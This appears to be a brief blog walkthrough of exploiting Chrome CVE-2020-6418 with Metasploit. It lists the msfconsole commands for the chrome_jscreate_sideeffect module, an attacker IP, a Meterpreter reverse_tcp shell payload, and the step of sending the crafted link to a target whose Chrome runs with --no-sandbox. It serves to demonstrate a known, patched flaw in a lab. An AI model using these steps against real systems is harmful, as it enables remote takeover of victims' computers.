Hello Everyone, this post demonstration exploitation of google chrome vulnerability occurred in 80.0.3987.122 version. Which is CVE-2020-6418,allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2020-6418

Metasploit Framework included exploit of this vulnerability, so let’s search for modules related to chrome and select the specific one that we required.

msfconsole
search chrome //To Search modules related to chrome

Select and copy the exploit given below from list

use exploit/multi/browser/chrome_jscreate_sideeffect
set srvhost 192.168.43.19  //Attacker IP 
set uripath /

also need to set payload, we are targeting Windows 10 x64

set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.43.19
exploit

now need to share the link which having crafted html to our target.

On target system make sure that your launching chrome with no-sandbox option for that you can open cmd and run command start chrome –no-sandbox and open link.

Learn Virtually

LEAVE A REPLY

Please enter your comment!
Please enter your name here